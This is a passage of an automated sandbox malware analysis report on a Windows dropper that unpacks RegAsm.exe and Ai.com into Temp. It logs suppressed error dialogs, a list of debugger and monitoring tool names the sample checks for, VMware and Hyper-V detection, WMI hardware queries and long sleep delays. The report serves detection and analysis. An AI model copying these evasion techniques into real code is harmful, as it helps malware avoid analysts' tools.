                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: devobj.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dll
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: PQwHxAiBGt.exeStatic file information: File size 5276672 > 1048576
                  Source: PQwHxAiBGt.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x40f200
                  Source: PQwHxAiBGt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: PQwHxAiBGt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: PQwHxAiBGt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: PQwHxAiBGt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: PQwHxAiBGt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: PQwHxAiBGt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: PQwHxAiBGt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: PQwHxAiBGt.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wkernel32.pdb source: svchost.exe, 00000012.00000003.1704338403.0000000004F40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1704249905.0000000004E20000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wkernelbase.pdb source: svchost.exe, 00000012.00000003.1704529751.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1705181582.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb source: svchost.exe, 00000012.00000003.1703439346.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1703648304.00000000053F0000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000010.00000000.1644614167.00000000000C2000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe.13.dr
                  Source: Binary string: wntdll.pdbUGP source: svchost.exe, 00000012.00000003.1704088858.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1703907796.0000000004E20000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdbUGP source: svchost.exe, 00000012.00000003.1703439346.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1703648304.00000000053F0000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: svchost.exe, 00000012.00000003.1704088858.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1703907796.0000000004E20000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000010.00000000.1644614167.00000000000C2000.00000002.00000001.01000000.00000010.sdmp, RegAsm.exe.13.dr
                  Source: Binary string: wkernel32.pdbUGP source: svchost.exe, 00000012.00000003.1704338403.0000000004F40000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1704249905.0000000004E20000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: wkernelbase.pdbUGP source: svchost.exe, 00000012.00000003.1704529751.0000000005200000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000012.00000003.1705181582.0000000005420000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: Setup.pdb source: PQwHxAiBGt.exe
                  Source: PQwHxAiBGt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: PQwHxAiBGt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: PQwHxAiBGt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: PQwHxAiBGt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: PQwHxAiBGt.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,3_2_004062FC
                  Source: setup.tmp.2.drStatic PE information: real checksum: 0x26b7e9 should be: 0x302cd2
                  Source: setup.exe.0.drStatic PE information: real checksum: 0xcd87d should be: 0x20c3f1
                  Source: PQwHxAiBGt.exeStatic PE information: real checksum: 0x0 should be: 0x517911
                  Source: RobertsonDeclined.exe.0.drStatic PE information: real checksum: 0x1af179 should be: 0x1b03c5
                  Source: setup.exe.0.drStatic PE information: section name: .didata
                  Source: setup.tmp.2.drStatic PE information: section name: .eh_fram
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0024AFA0 push edx; mov dword ptr [esp], eax4_2_0024C94A
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F2079 push eax; mov dword ptr [esp], ebx4_2_0032FA6D
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F209E push eax; mov dword ptr [esp], ebx4_2_0032FA6D
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F2097 push eax; mov dword ptr [esp], ebx4_2_0032FA6D
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F208B push eax; mov dword ptr [esp], ebx4_2_0032FA6D
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F20B3 push eax; mov dword ptr [esp], ebx4_2_0032FA6D
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F20AC push eax; mov dword ptr [esp], ebx4_2_0032FA6D
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F20A5 push eax; mov dword ptr [esp], ebx4_2_0032FA6D
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001C831D push eax; mov dword ptr [esp], esi4_2_0032EDDD
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001C8316 push eax; mov dword ptr [esp], esi4_2_0032EDDD
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0023C379 push eax; retn 0023h4_2_0023C386
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0023C38B pushad ; retn 0023h4_2_0023C3A2
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00332534 push edx; mov dword ptr [esp], edi4_2_0033272B
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002FE660 push eax; mov dword ptr [esp], esi4_2_00331185
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001C8644 push eax; mov dword ptr [esp], esi4_2_0032EDDD
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002E0860 push edx; mov dword ptr [esp], ebx4_2_002E0A75
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002E0860 push eax; mov dword ptr [esp], ebx4_2_002E0A98
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F0BAB push eax; mov dword ptr [esp], ebx4_2_0032F9AE
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F0BAB push eax; mov dword ptr [esp], ebx4_2_0032F9C4
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F0BAB push eax; mov dword ptr [esp], ebx4_2_0032FA6D
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F117D push eax; mov dword ptr [esp], ebx4_2_0032F9C4
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F117D push eax; mov dword ptr [esp], ebx4_2_0032FA6D
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0020548E push eax; mov dword ptr [esp], ebx4_2_0033000A
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00205495 push eax; mov dword ptr [esp], ebx4_2_0033000A
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002E1570 push eax; mov dword ptr [esp], ebx4_2_002E1840
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002E1570 push edx; mov dword ptr [esp], ebx4_2_002E185F
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F1A20 push eax; mov dword ptr [esp], ebx4_2_0032FA6D
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F1A20 push eax; mov dword ptr [esp], ebx4_2_0032FA6D
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001F1A20 push eax; mov dword ptr [esp], ebx4_2_0032FA6D
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002E1AE0 push eax; mov dword ptr [esp], ebx4_2_002E1DB0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002E1AE0 push edx; mov dword ptr [esp], ebx4_2_002E1DCF

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\422648\Ai.comJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comFile created: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\422648\Ai.comJump to dropped file
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeFile created: C:\Users\user\AppData\Local\Temp\setup.exeJump to dropped file
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeFile created: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\MotionJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeFile created: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeFile created: C:\Users\user\AppData\Local\Temp\MotionJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002468C0 IsIconic,IsWindowVisible,IsZoomed,GetCursorPos,WindowFromPoint,GetClientRect,ClientToScreen,ClientToScreen,ClientToScreen,PtInRect,4_2_002468C0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_002468C0 IsIconic,IsWindowVisible,IsZoomed,GetCursorPos,WindowFromPoint,GetClientRect,ClientToScreen,ClientToScreen,ClientToScreen,PtInRect,4_2_002468C0
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_00247720 SystemParametersInfoW,SystemParametersInfoW,SystemParametersInfoW,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleW,CreateWindowExW,ShowWindow,RegisterDeviceNotificationW,PeekMessageW,TranslateMessage,DispatchMessageW,TranslateMessage,DispatchMessageW,PeekMessageW,4_2_00247720
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\PQwHxAiBGt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 8108, type: MEMORYSTR
                  Source: C:\Windows\SysWOW64\svchost.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0023AF7B4_2_0023AF7B
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0023720D4_2_0023720D
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeAPI/Special instruction interceptor: Address: 7FF8418CD044
                  Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FF8418CD044
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AUTORUNSC.EXE
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OLLYDBG.EXE
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X64DBG.EXE
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: REGMON.EXE
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXEAUTORUNSC.EXERESOURCEHACKER.EXEFILEMON.EXEREGMON.EXEWINDANR.EXET
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: PETOOLS.EXE
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHA
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TORUNS.EXEDUMPCAP.EXEDE4
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: WINDANR.EXE
                  Source: svchost.exe, 00000012.00000002.1713732166.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FILEMON.EXE
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeMemory allocated: B30000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeMemory allocated: 27A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeMemory allocated: 2460000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpAPI coverage: 2.7 %
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_0023720D4_2_0023720D
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exe TID: 8052Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                  Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_004062D5 FindFirstFileW,FindClose,3_2_004062D5
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_00402E18 FindFirstFileW,3_2_00402E18
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,3_2_00406C9B
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001ED280 VirtualQuery,GetModuleFileNameW,wcsrchr,wcscpy,FindFirstFileW,wcscpy,LoadLibraryW,GetProcAddress,wcsrchr,_wcslwr,strcpy,FindNextFileW,4_2_001ED280
                  Source: C:\Users\user\AppData\Local\Temp\is-TN43S.tmp\setup.tmpCode function: 4_2_001EEB60 GetSystemInfo,4_2_001EEB60
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\422648\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\422648Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
                  Source: PQwHxAiBGt.exe, 00000000.00000003.1467116576.0000000002D91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: jJIvmCI7<
                  Source: setup.tmp, 00000004.00000003.1348573605.0000000001566000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\>
                  Source: setup.tmp, 00000004.00000003.1348573605.0000000001566000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                  Source: PQwHxAiBGt.exe, 00000000.00000002.1469785835.00000000012F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP
                  Source: setup.tmp, 00000004.00000003.1348573605.0000000001566000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}`
                  Source: svchost.exe, 00000012.00000003.1705181582.0000000005420000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                  Source: setup.tmp, 00000004.00000003.1348573605.0000000001566000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                  Source: RegAsm.exe, 00000011.00000002.1703186711.0000000000AE7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMCIDevSymbol
                  Source: setup.tmp, 00000004.00000003.1348573605.0000000001566000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\-6
                  Source: svchost.exe, 00000012.00000003.1705181582.0000000005420000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                  Source: setup.tmp, 00000004.00000003.1348573605.0000000001566000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
                  Source: setup.tmp, 00000004.00000002.1464638517.0000000001566000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: C:\Users\user\AppData\Local\Temp\422648\Ai.comProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\RobertsonDeclined.exeCode function: 3_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,3_2_004062FC
                  Source: C:\Users\user\AppData\Local\Temp\422648\RegAsm.exeCode function: 17_2_04CF1277 mov eax, dword ptr fs:[00000030h]17_2_04CF1277
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 18_3_00860283 mov eax, dword ptr fs:[00000030h]18_3_00860283
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: DebugJump to behavior
